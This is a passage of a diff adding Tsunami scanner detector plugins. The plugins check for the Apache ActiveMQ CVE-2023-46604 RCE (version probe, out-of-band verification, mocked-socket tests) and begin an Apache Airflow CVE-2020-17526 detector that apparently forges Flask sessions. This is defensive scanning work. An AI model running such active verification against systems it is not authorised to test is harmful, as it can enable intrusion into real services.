e) { + return false; + } + } + + private String getServerVersion(String serverAddress, int serverPort) { + try { + Socket socket = socketFactory.createSocket(serverAddress, serverPort); + DataInputStream dataInputStream = new DataInputStream(socket.getInputStream()); + byte[] header = new byte[22]; + dataInputStream.readFully(header); + Map maps = MarshallingSupport.unmarshalPrimitiveMap(dataInputStream, 4096); + return maps.get("ProviderVersion").toString(); + } catch (Exception e) { + logger.atWarning().withCause(e).log("Get Target Version Failed"); + return ""; + } + } + + private DetectionReport buildDetectionReport( + TargetInfo targetInfo, NetworkService vulnerableNetworkService) { + TextData details = + TextData.newBuilder().setText("The detected software version is " + currentVersion).build(); + return DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(vulnerableNetworkService) + .setDetectionTimestamp(Timestamps.fromMillis(Instant.now(utcClock).toEpochMilli())) + .setDetectionStatus( + useOobVerifyVulnerable + ? DetectionStatus.VULNERABILITY_VERIFIED + : DetectionStatus.VULNERABILITY_PRESENT) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2023_46604")) + .setSeverity(useOobVerifyVulnerable ? Severity.CRITICAL : Severity.HIGH) + .setTitle("CVE-2023-46604 Apache ActiveMQ RCE") + .setRecommendation("Upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3") + .setDescription( + useOobVerifyVulnerable + ? VULN_DESCRIPTION_OF_OOB_VERIFY + : VULN_DESCRIPTION_OF_VERSION) + .addAdditionalDetails(AdditionalDetail.newBuilder().setTextData(details))) + .build(); + } + + @Qualifier + @Retention(RetentionPolicy.RUNTIME) + @interface SocketFactoryInstance {} +} diff --git a/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604DetectorBootstrapModule.java b/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604DetectorBootstrapModule.java new file mode 100644 index 000000000..742675a65 --- /dev/null +++ b/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604DetectorBootstrapModule.java @@ -0,0 +1,46 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve202346604; + +import com.google.inject.Key; +import com.google.inject.Provides; +import com.google.inject.multibindings.OptionalBinder; +import com.google.tsunami.plugin.PluginBootstrapModule; +import com.google.tsunami.plugins.detectors.cves.cve202346604.Annotations.OobSleepDuration; +import javax.net.SocketFactory; + +/** An CVE-2023-46604 Guice module that bootstraps the {@link Cve202346604Detector}. */ +public final class Cve202346604DetectorBootstrapModule extends PluginBootstrapModule { + + @Override + protected void configurePlugin() { + OptionalBinder.newOptionalBinder( + binder(), + Key.get(SocketFactory.class, Cve202346604Detector.SocketFactoryInstance.class)) + .setDefault() + .toInstance(SocketFactory.getDefault()); + registerPlugin(Cve202346604Detector.class); + } + + @Provides + @OobSleepDuration + int provideOobSleepDuration(Cve202346604DetectorConfigs configs) { + if (configs.oobSleepDuration == 0) { + return 20; + } + return configs.oobSleepDuration; + } +} diff --git a/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604DetectorConfigs.java b/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604DetectorConfigs.java new file mode 100644 index 000000000..bea1438a4 --- /dev/null +++ b/community/detectors/apache_activemq_cve_2023_46604/src/main/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604DetectorConfigs.java @@ -0,0 +1,23 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve202346604; + +import com.google.tsunami.common.config.annotations.ConfigProperties; + +@ConfigProperties("plugins.community.detectors.cves.cve202346604") +final class Cve202346604DetectorConfigs { + int oobSleepDuration; +} diff --git a/community/detectors/apache_activemq_cve_2023_46604/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604DetectorTest.java b/community/detectors/apache_activemq_cve_2023_46604/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604DetectorTest.java new file mode 100644 index 000000000..8f64cf338 --- /dev/null +++ b/community/detectors/apache_activemq_cve_2023_46604/src/test/java/com/google/tsunami/plugins/detectors/cves/cve202346604/Cve202346604DetectorTest.java @@ -0,0 +1,300 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.detectors.cves.cve202346604; + +import static com.google.common.truth.extensions.proto.ProtoTruth.assertThat; +import static com.google.tsunami.common.data.NetworkEndpointUtils.forIpAndPort; +import static com.google.tsunami.plugins.detectors.cves.cve202346604.Cve202346604Detector.VULN_DESCRIPTION_OF_OOB_VERIFY; +import static com.google.tsunami.plugins.detectors.cves.cve202346604.Cve202346604Detector.VULN_DESCRIPTION_OF_VERSION; +import static java.nio.charset.StandardCharsets.UTF_8; +import static org.mockito.ArgumentMatchers.anyInt; +import static org.mockito.ArgumentMatchers.anyString; +import static org.mockito.Mockito.mock; +import static org.mockito.Mockito.when; + +import com.google.common.collect.ImmutableList; +import com.google.inject.AbstractModule; +import com.google.inject.Guice; +import com.google.inject.Key; +import com.google.inject.multibindings.OptionalBinder; +import com.google.inject.testing.fieldbinder.Bind; +import com.google.inject.testing.fieldbinder.BoundFieldModule; +import com.google.inject.util.Modules; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.net.http.HttpClientModule; +import com.google.tsunami.common.time.testing.FakeUtcClock; +import com.google.tsunami.common.time.testing.FakeUtcClockModule; +import com.google.tsunami.plugin.payload.testing.FakePayloadGeneratorModule; +import com.google.tsunami.plugin.payload.testing.PayloadTestHelper; +import com.google.tsunami.plugins.detectors.cves.cve202346604.Annotations.OobSleepDuration; +import com.google.tsunami.plugins.detectors.cves.cve202346604.Cve202346604Detector.SocketFactoryInstance; +import com.google.tsunami.proto.*; +import java.io.*; +import java.net.Socket; +import java.nio.charset.StandardCharsets; +import java.security.SecureRandom; +import java.time.Instant; +import java.util.Arrays; +import java.util.Map; +import javax.inject.Inject; +import javax.net.SocketFactory; +import okhttp3.mockwebserver.MockWebServer; +import org.apache.activemq.util.MarshallingSupport; +import org.junit.Before; +import org.junit.Test; +import org.junit.runner.RunWith; +import org.junit.runners.JUnit4; + +/** Unit tests for {@link Cve202346604Detector}. */ +@RunWith(JUnit4.class) +public final class Cve202346604DetectorTest { + + private final FakeUtcClock fakeUtcClock = + FakeUtcClock.create().setNow(Instant.parse("2020-01-01T00:00:00.00Z")); + + private final SocketFactory socketFactoryMock = mock(SocketFactory.class); + private final SecureRandom testSecureRandom = + new SecureRandom() { + @Override + public void nextBytes(byte[] bytes) { + Arrays.fill(bytes, (byte) 0xFF); + } + }; + private final MockWebServer mockCallbackServer = new MockWebServer(); + private final TextData details = + TextData.newBuilder().setText("The detected software version is 5.17.3").build(); + @Inject private Cve202346604Detector detector; + + @Bind(lazy = true) + @OobSleepDuration + private int sleepDuration = 1; + + @Before + public void setUp() throws IOException { + mockCallbackServer.start(); + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + FakePayloadGeneratorModule.builder() + .setCallbackServer(mockCallbackServer) + .setSecureRng(testSecureRandom) + .build(), + new AbstractModule() { + @Override + protected void configure() { + OptionalBinder.newOptionalBinder( + binder(), Key.get(SocketFactory.class, SocketFactoryInstance.class)) + .setBinding() + .toInstance(socketFactoryMock); + } + }, + Modules.override(new Cve202346604DetectorBootstrapModule()) + .with(BoundFieldModule.of(this)), + new HttpClientModule.Builder().build()) + .injectMembers(this); + } + + public void setUpNoOob() throws IOException { + mockCallbackServer.shutdown(); + Guice.createInjector( + new FakeUtcClockModule(fakeUtcClock), + new Cve202346604DetectorBootstrapModule(), + FakePayloadGeneratorModule.builder() + .setCallbackServer(null) + .setSecureRng(testSecureRandom) + .build(), + new AbstractModule() { + @Override + protected void configure() { + OptionalBinder.newOptionalBinder( + binder(), Key.get(SocketFactory.class, SocketFactoryInstance.class)) + .setBinding() + .toInstance(socketFactoryMock); + } + }, + new HttpClientModule.Builder().build()) + .injectMembers(this); + } + + @Test + public void detect_whenVulnerable_returnsVulnerability() throws Exception { + final byte[] serverInfoResponse = + new byte[] { + 0, 0, 1, 82, 1, 65, 99, 116, 105, 118, 101, 77, 81, 0, 0, 0, 12, 1, 0, 0, 1, 64, 0, 0, 0, + 13, 0, 17, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 69, 110, 97, 98, 108, 101, 100, 1, + 1, 0, 15, 80, 108, 97, 116, 102, 111, 114, 109, 68, 101, 116, 97, 105, 108, 115, 9, 0, 4, + 74, 97, 118, 97, 0, 12, 67, 97, 99, 104, 101, 69, 110, 97, 98, 108, 101, 100, 1, 1, 0, 17, + 84, 99, 112, 78, 111, 68, 101, 108, 97, 121, 69, 110, 97, 98, 108, 101, 100, 1, 1, 0, 18, + 83, 105, 122, 101, 80, 114, 101, 102, 105, 120, 68, 105, 115, 97, 98, 108, 101, 100, 1, 0, + 0, 9, 67, 97, 99, 104, 101, 83, 105, 122, 101, 5, 0, 0, 4, 0, 0, 12, 80, 114, 111, 118, + 105, 100, 101, 114, 78, 97, 109, 101, 9, 0, 8, 65, 99, 116, 105, 118, 101, 77, 81, 0, 20, + 84, 105, 103, 104, 116, 69, 110, 99, 111, 100, 105, 110, 103, 69, 110, 97, 98, 108, 101, + 100, 1, 1, 0, 12, 77, 97, 120, 70, 114, 97, 109, 101, 83, 105, 122, 101, 6, 0, 0, 0, 0, 6, + 64, 0, 0, 0, 21, 77, 97, 120, 73, 110, 97, 99, 116, 105, 118, 105, 116, 121, 68, 117, 114, + 97, 116, 105, 111, 110, 6, 0, 0, 0, 0, 0, 0, 117, 48, 0, 32, 77, 97, 120, 73, 110, 97, 99, + 116, 105, 118, 105, 116, 121, 68, 117, 114, 97, 116, 105, 111, 110, 73, 110, 105, 116, 97, + 108, 68, 101, 108, 97, 121, 6, 0, 0, 0, 0, 0, 0, 39, 16, 0, 19, 77, 97, 120, 70, 114, 97, + 109, 101, 83, 105, 122, 101, 69, 110, 97, 98, 108, 101, 100, 1, 1, 0, 15, 80, 114, 111, + 118, 105, 100, 101, 114, 86, 101, 114, 115, 105, 111, 110, 9, 0, 6, 53, 46, 49, 55, 46, 51 + }; + + configureMockSocket(new String(serverInfoResponse, StandardCharsets.UTF_8)); + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint(forIpAndPort("127.0.0.1", 1234)) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("ActiveMQ")) + .build(); + TargetInfo targetInfo = TargetInfo.getDefaultInstance(); + mockCallbackServer.enqueue(PayloadTestHelper.generateMockSuccessfulCallbackResponse()); + + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(service) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_VERIFIED) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2023_46604")) + .setSeverity(Severity.CRITICAL) + .setTitle("CVE-2023-46604 Apache ActiveMQ RCE") + .setRecommendation("Upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3") + .setDescription(VULN_DESCRIPTION_OF_OOB_VERIFY) + .addAdditionalDetails(AdditionalDetail.newBuilder().setTextData(details))) + .build()); + } + + @Test + public void detect_whenNotVulnerable_returnsNoVulnerability() throws Exception { + final byte[] serverInfoResponse = + new byte[] { + 0, 0, 1, 82, 1, 65, 99, 116, 105, 118, 101, 77, 81, 0, 0, 0, 12, 1, 0, 0, 1, 64, 0, 0, 0, + 13, 0, 17, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 69, 110, 97, 98, 108, 101, 100, 1, + 1, 0, 15, 80, 108, 97, 116, 102, 111, 114, 109, 68, 101, 116, 97, 105, 108, 115, 9, 0, 4, + 74, 97, 118, 97, 0, 12, 67, 97, 99, 104, 101, 69, 110, 97, 98, 108, 101, 100, 1, 1, 0, 17, + 84, 99, 112, 78, 111, 68, 101, 108, 97, 121, 69, 110, 97, 98, 108, 101, 100, 1, 1, 0, 18, + 83, 105, 122, 101, 80, 114, 101, 102, 105, 120, 68, 105, 115, 97, 98, 108, 101, 100, 1, 0, + 0, 9, 67, 97, 99, 104, 101, 83, 105, 122, 101, 5, 0, 0, 4, 0, 0, 12, 80, 114, 111, 118, + 105, 100, 101, 114, 78, 97, 109, 101, 9, 0, 8, 65, 99, 116, 105, 118, 101, 77, 81, 0, 20, + 84, 105, 103, 104, 116, 69, 110, 99, 111, 100, 105, 110, 103, 69, 110, 97, 98, 108, 101, + 100, 1, 1, 0, 12, 77, 97, 120, 70, 114, 97, 109, 101, 83, 105, 122, 101, 6, 0, 0, 0, 0, 6, + 64, 0, 0, 0, 21, 77, 97, 120, 73, 110, 97, 99, 116, 105, 118, 105, 116, 121, 68, 117, 114, + 97, 116, 105, 111, 110, 6, 0, 0, 0, 0, 0, 0, 117, 48, 0, 32, 77, 97, 120, 73, 110, 97, 99, + 116, 105, 118, 105, 116, 121, 68, 117, 114, 97, 116, 105, 111, 110, 73, 110, 105, 116, 97, + 108, 68, 101, 108, 97, 121, 6, 0, 0, 0, 0, 0, 0, 39, 16, 0, 19, 77, 97, 120, 70, 114, 97, + 109, 101, 83, 105, 122, 101, 69, 110, 97, 98, 108, 101, 100, 1, 1, 0, 15, 80, 114, 111, + 118, 105, 100, 101, 114, 86, 101, 114, 115, 105, 111, 110, 9, 0, 6, 53, 46, 49, 55, 46, 54 + }; + + configureMockSocket(new String(serverInfoResponse, StandardCharsets.UTF_8)); + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint(forIpAndPort("127.0.0.1", 1234)) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("ActiveMQ")) + .build(); + TargetInfo targetInfo = TargetInfo.getDefaultInstance(); + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } + + @Test + public void detect_whenVulnerableWithoutOob_returnsVulnerability() throws Exception { + this.setUpNoOob(); + final byte[] serverInfoResponse = + new byte[] { + 0, 0, 1, 82, 1, 65, 99, 116, 105, 118, 101, 77, 81, 0, 0, 0, 12, 1, 0, 0, 1, 64, 0, 0, 0, + 13, 0, 17, 83, 116, 97, 99, 107, 84, 114, 97, 99, 101, 69, 110, 97, 98, 108, 101, 100, 1, + 1, 0, 15, 80, 108, 97, 116, 102, 111, 114, 109, 68, 101, 116, 97, 105, 108, 115, 9, 0, 4, + 74, 97, 118, 97, 0, 12, 67, 97, 99, 104, 101, 69, 110, 97, 98, 108, 101, 100, 1, 1, 0, 17, + 84, 99, 112, 78, 111, 68, 101, 108, 97, 121, 69, 110, 97, 98, 108, 101, 100, 1, 1, 0, 18, + 83, 105, 122, 101, 80, 114, 101, 102, 105, 120, 68, 105, 115, 97, 98, 108, 101, 100, 1, 0, + 0, 9, 67, 97, 99, 104, 101, 83, 105, 122, 101, 5, 0, 0, 4, 0, 0, 12, 80, 114, 111, 118, + 105, 100, 101, 114, 78, 97, 109, 101, 9, 0, 8, 65, 99, 116, 105, 118, 101, 77, 81, 0, 20, + 84, 105, 103, 104, 116, 69, 110, 99, 111, 100, 105, 110, 103, 69, 110, 97, 98, 108, 101, + 100, 1, 1, 0, 12, 77, 97, 120, 70, 114, 97, 109, 101, 83, 105, 122, 101, 6, 0, 0, 0, 0, 6, + 64, 0, 0, 0, 21, 77, 97, 120, 73, 110, 97, 99, 116, 105, 118, 105, 116, 121, 68, 117, 114, + 97, 116, 105, 111, 110, 6, 0, 0, 0, 0, 0, 0, 117, 48, 0, 32, 77, 97, 120, 73, 110, 97, 99, + 116, 105, 118, 105, 116, 121, 68, 117, 114, 97, 116, 105, 111, 110, 73, 110, 105, 116, 97, + 108, 68, 101, 108, 97, 121, 6, 0, 0, 0, 0, 0, 0, 39, 16, 0, 19, 77, 97, 120, 70, 114, 97, + 109, 101, 83, 105, 122, 101, 69, 110, 97, 98, 108, 101, 100, 1, 1, 0, 15, 80, 114, 111, + 118, 105, 100, 101, 114, 86, 101, 114, 115, 105, 111, 110, 9, 0, 6, 53, 46, 49, 55, 46, 51 + }; + + configureMockSocket(new String(serverInfoResponse, StandardCharsets.UTF_8)); + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint(forIpAndPort("127.0.0.1", 1234)) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("ActiveMQ")) + .build(); + TargetInfo targetInfo = TargetInfo.getDefaultInstance(); + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + + assertThat(detectionReports.getDetectionReportsList()) + .containsExactly( + DetectionReport.newBuilder() + .setTargetInfo(targetInfo) + .setNetworkService(service) + .setDetectionTimestamp( + Timestamps.fromMillis(Instant.now(fakeUtcClock).toEpochMilli())) + .setDetectionStatus(DetectionStatus.VULNERABILITY_PRESENT) + .setVulnerability( + Vulnerability.newBuilder() + .setMainId( + VulnerabilityId.newBuilder() + .setPublisher("TSUNAMI_COMMUNITY") + .setValue("CVE_2023_46604")) + .setSeverity(Severity.HIGH) + .setTitle("CVE-2023-46604 Apache ActiveMQ RCE") + .setRecommendation("Upgrade to version 5.15.16, 5.16.7, 5.17.6, or 5.18.3") + .setDescription(VULN_DESCRIPTION_OF_VERSION) + .addAdditionalDetails(AdditionalDetail.newBuilder().setTextData(details))) + .build()); + } + + @Test + public void detect_whenNotVulnerable_returnVersionNotMatch() throws Exception { + OutputStream os = new ByteArrayOutputStream(); + DataOutputStream dos = new DataOutputStream(os); + dos.write(new byte[22]); + MarshallingSupport.marshalPrimitiveMap(Map.of("ProviderVersion", "5.15.17"), dos); + configureMockSocket(os.toString()); + NetworkService service = + NetworkService.newBuilder() + .setNetworkEndpoint(forIpAndPort("127.0.0.1", 1234)) + .setTransportProtocol(TransportProtocol.TCP) + .setSoftware(Software.newBuilder().setName("ActiveMQ")) + .build(); + TargetInfo targetInfo = TargetInfo.getDefaultInstance(); + DetectionReportList detectionReports = detector.detect(targetInfo, ImmutableList.of(service)); + assertThat(detectionReports.getDetectionReportsList()).isEmpty(); + } + + private void configureMockSocket(String response) throws Exception { + Socket socket = mock(Socket.class); + when(socketFactoryMock.createSocket(anyString(), anyInt())).thenReturn(socket); + when(socket.getOutputStream()).thenReturn(new ByteArrayOutputStream()); + when(socket.getInputStream()).thenReturn(new ByteArrayInputStream(response.getBytes(UTF_8))); + } +} diff --git a/community/detectors/apache_airflow_cve_2020_17526/README.md b/community/detectors/apache_airflow_cve_2020_17526/README.md new file mode 100644 index 000000000..254aa3681 --- /dev/null +++ b/community/detectors/apache_airflow_cve_2020_17526/README.md @@ -0,0 +1,19 @@ +# Apache Airflow CVE-2020-17526 Detector + +This plugin for Tsunami detects a remote code execution (RCE) vulnerability in a +default DAG of apache airflow UI with the help of CVE-2020-17526, which is an +authentication bypass vulnerability. + +More information on the vulnerability: + +* [CVE-2020-17526](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-17526) + +## Build jar file for this plugin + +Using `gradlew`: + +```shell +./gradlew jar +``` + +Tsunami identifiable jar file is located at `build/libs` directory. diff --git a/community/detectors/apache_airflow_cve_2020_17526/build.gradle b/community/detectors/apache_airflow_cve_2020_17526/build.gradle new file mode 100644 index 000000000..5e510ec8e --- /dev/null +++ b/community/detectors/apache_airflow_cve_2020_17526/build.gradle @@ -0,0 +1,68 @@ +plugins { + id 'java-library' +} + +description = 'Tsunami detector for CVE-2020-17526.' +group = 'com.google.tsunami' +version = '0.0.1-SNAPSHOT' + +repositories { + maven { // The google mirror is less flaky than mavenCentral() + url 'https://maven-central.storage-download.googleapis.com/repos/central/data/' + } + mavenCentral() + mavenLocal() +} + +java { + sourceCompatibility = JavaVersion.VERSION_11 + targetCompatibility = JavaVersion.VERSION_11 + + jar.manifest { + attributes('Implementation-Title': name, + 'Implementation-Version': version, + 'Built-By': System.getProperty('user.name'), + 'Built-JDK': System.getProperty('java.version'), + 'Source-Compatibility': sourceCompatibility, + 'Target-Compatibility': targetCompatibility) + } + + javadoc.options { + encoding = 'UTF-8' + use = true + links 'https://docs.oracle.com/javase/8/docs/api/' + } + + // Log stacktrace to console when test fails. + test { + testLogging { + exceptionFormat = 'full' + showExceptions true + showCauses true + showStackTraces true + } + maxHeapSize = '1500m' + } +} + +ext { + tsunamiVersion = 'latest.release' + junitVersion = '4.13' + mockitoVersion = '2.28.2' + truthVersion = '1.0.1' + guiceVersion = '4.2.3' +} + +dependencies { + implementation "com.google.tsunami:tsunami-common:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-plugin:${tsunamiVersion}" + implementation "com.google.tsunami:tsunami-proto:${tsunamiVersion}" + + testImplementation "junit:junit:${junitVersion}" + testImplementation "com.google.inject:guice:${guiceVersion}" + testImplementation "com.google.inject.extensions:guice-testlib:${guiceVersion}" + testImplementation "org.mockito:mockito-core:${mockitoVersion}" + testImplementation "com.google.truth:truth:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-java8-extension:${truthVersion}" + testImplementation "com.google.truth.extensions:truth-proto-extension:${truthVersion}" +} diff --git a/community/detectors/mlflow_cve_2023_1177/gradle/wrapper/gradle-wrapper.jar b/community/detectors/apache_airflow_cve_2020_17526/gradle/wrapper/gradle-wrapper.jar similarity index 100% rename from community/detectors/mlflow_cve_2023_1177/gradle/wrapper/gradle-wrapper.jar rename to community/detectors/apache_airflow_cve_2020_17526/gradle/wrapper/gradle-wrapper.jar diff --git a/community/detectors/apache_airflow_cve_2020_17526/gradle/wrapper/gradle-wrapper.properties b/community/detectors/apache_airflow_cve_2020_17526/gradle/wrapper/gradle-wrapper.properties new file mode 100644 index 000000000..d04736436 --- /dev/null +++ b/community/detectors/apache_airflow_cve_2020_17526/gradle/wrapper/gradle-wrapper.properties @@ -0,0 +1,7 @@ +distributionBase=GRADLE_USER_HOME +distributionPath=wrapper/dists +distributionUrl=https\://services.gradle.org/distributions/gradle-7.0-bin.zip +networkTimeout=10000 +validateDistributionUrl=true +zipStoreBase=GRADLE_USER_HOME +zipStorePath=wrapper/dists diff --git a/community/detectors/mlflow_cve_2023_1177/gradlew b/community/detectors/apache_airflow_cve_2020_17526/gradlew similarity index 100% rename from community/detectors/mlflow_cve_2023_1177/gradlew rename to community/detectors/apache_airflow_cve_2020_17526/gradlew diff --git a/community/detectors/mlflow_cve_2023_1177/gradlew.bat b/community/detectors/apache_airflow_cve_2020_17526/gradlew.bat similarity index 100% rename from community/detectors/mlflow_cve_2023_1177/gradlew.bat rename to community/detectors/apache_airflow_cve_2020_17526/gradlew.bat diff --git a/community/detectors/apache_airflow_cve_2020_17526/settings.gradle b/community/detectors/apache_airflow_cve_2020_17526/settings.gradle new file mode 100644 index 000000000..b22f0def3 --- /dev/null +++ b/community/detectors/apache_airflow_cve_2020_17526/settings.gradle @@ -0,0 +1 @@ +rootProject.name = 'cve202017526' diff --git a/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Annotations.java b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Annotations.java new file mode 100644 index 000000000..7626174d0 --- /dev/null +++ b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Annotations.java @@ -0,0 +1,35 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.google.tsunami.plugins.cve202017526; + +import static java.lang.annotation.ElementType.FIELD; +import static java.lang.annotation.ElementType.METHOD; +import static java.lang.annotation.ElementType.PARAMETER; + +import java.lang.annotation.Retention; +import java.lang.annotation.RetentionPolicy; +import java.lang.annotation.Target; +import javax.inject.Qualifier; + +/** Annotation for {@link Cve202017526Detector}. */ +final class Annotations { + @Qualifier + @Retention(RetentionPolicy.RUNTIME) + @Target({PARAMETER, METHOD, FIELD}) + @interface OobSleepDuration {} + + private Annotations() {} +} diff --git a/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526Detector.java b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526Detector.java new file mode 100644 index 000000000..6fd3dedc7 --- /dev/null +++ b/community/detectors/apache_airflow_cve_2020_17526/src/main/java/com/google/tsunami/plugins/cve202017526/Cve202017526Detector.java @@ -0,0 +1,268 @@ +/* + * Copyright 2024 Google LLC + * + * Licensed under the Apache License, Version 2.0 (the "License"); + * you may not use this file except in compliance with the License. + * You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ + +package com.google.tsunami.plugins.cve202017526; + +import static com.google.common.base.Preconditions.checkNotNull; +import static com.google.common.collect.ImmutableList.toImmutableList; +import static java.nio.charset.StandardCharsets.UTF_8; + +import com.google.common.collect.ImmutableList; +import com.google.common.flogger.GoogleLogger; +import com.google.common.util.concurrent.Uninterruptibles; +import com.google.protobuf.ByteString; +import com.google.protobuf.util.Timestamps; +import com.google.tsunami.common.data.NetworkServiceUtils; +import com.google.tsunami.common.net.http.HttpClient; +import com.google.tsunami.common.net.http.HttpHeaders; +import com.google.tsunami.common.net.http.HttpRequest; +import com.google.tsunami.common.net.http.HttpResponse; +import com.google.tsunami.common.time.UtcClock; +import com.google.tsunami.plugin.annotations.ForWebService; +import com.google.tsunami.plugin.annotations.PluginInfo; +import com.google.tsunami.plugin.payload.NotImplementedException; +import com.google.tsunami.plugin.payload.Payload; +import com.google.tsunami.plugin.payload.PayloadGenerator; +import com.google.tsunami.plugin.PluginType; +import com.google.tsunami.plugin.VulnDetector; +import com.google.tsunami.plugins.cve202017526.Annotations.OobSleepDuration; +import com.google.tsunami.plugins.cve202017526.flasksessionsigner.FlaskSessionSigner; +import com.google.tsunami.proto.DetectionReport; +import com.google.tsunami.proto.DetectionReportList; +import com.google.tsunami.proto.DetectionStatus; +import com.google.tsunami.proto.NetworkService; +import com.google.tsunami.proto.PayloadGeneratorConfig; +import com.google.tsunami.proto.Severity; +import com.google.tsunami.proto.TargetInfo; +import com.google.tsunami.proto.Vulnerability; +import com.google.tsunami.proto.VulnerabilityId; +import java.io.IOException; +import java.net.HttpCookie; +import java.net.URLEncoder; +import java.time.Clock; +import java.time.Duration; +import java.time.Instant; +import java.util.HashMap; +import java.util.List; +import java.util.Map; +import java.util.regex.Matcher; +import java.util.regex.Pattern; +import javax.inject.Inject; + +/** A VulnDetector plugin for CVE 202017526. */ +@PluginInfo( + type = PluginType.VULN_DETECTION, + name = "CVE-2020-17526 Detector", + version = "0.1", + description = + "This detector checks for occurrences of CVE-2020-17526 in apache airflow installations.", + author = "am0o0", + bootstrapModule = Cve202017526DetectorModule.class) +@ForWebService +public final class Cve202017526Detector implements VulnDetector { + private static final GoogleLogger logger = GoogleLogger.forEnclosingClass(); + private static final Pattern CSRF_PATTERN = Pattern.compile("var CSRF = \"([\\d\\w-.]+)\""); + + private final Clock utcClock; + private final HttpClient httpClient; + private final PayloadGenerator payloadGenerator; + private final int oobSleepDuration; + + @Inject + Cve202017526Detector( + @UtcClock Clock utcClock, + HttpClient httpClient, + PayloadGenerator payloadGenerator, + @OobSleepDuration int oobSleepDuration) { + this.utcClock = checkNotNull(utcClock); + this.httpClient = checkNotNull(httpClient).modify().setFollowRedirects(true).build(); + this.oobSleepDuration = oobSleepDuration; + this.payloadGenerator = checkNotNull(payloadGenerator); + } + + @Override + public DetectionReportList detect( + TargetInfo targetInfo, 